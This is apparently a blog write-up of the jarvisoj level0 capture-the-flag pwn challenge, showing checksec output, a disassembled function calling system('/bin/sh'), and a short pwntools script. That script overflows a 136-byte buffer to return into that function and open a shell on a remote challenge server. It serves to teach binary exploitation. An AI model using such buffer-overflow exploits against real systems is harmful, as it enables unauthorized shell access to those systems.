jarvisoj-level0 Writeup

checksec:

# zhailin @ DESKTOP-4OQQP8F in ~/Pwns/ROP/jarvisoj_level0 [12:17:21] C:2
$ checksec level0
[*] '/home/zhailin/Pwns/ROP/jarvisoj_level0/level0'
    Arch:       amd64-64-little
    RELRO:      No RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)
    Stripped:   No

offset: 136 （pwndbg自调）

Ctrl+X进去：

public callsystem
callsystem proc near
; __unwind {
push    rbp
mov     rbp, rsp
mov     edi, offset command ; "/bin/sh"
call    _system
pop     rbp
retn
; } // starts at 400596
callsystem endp

EXP:

from pwn import *

# sh = process('./level0')
sh = remote('node5.buuoj.cn',26806)

payload = b'a' * 136 + p64(0x400596)
sh.sendline(payload)
sh.interactive()

Pwn

#CTF #Pwn #ROP

jarvisoj-level0 Writeup

https://zer0ptr.github.io/2025/11/23/jarvisoj-level0/

作者

zer0ptr

发布于

2025年11月23日

许可协议

CTFWiki-堆概述学习笔记上一篇

warmup_csaw_2016 下一篇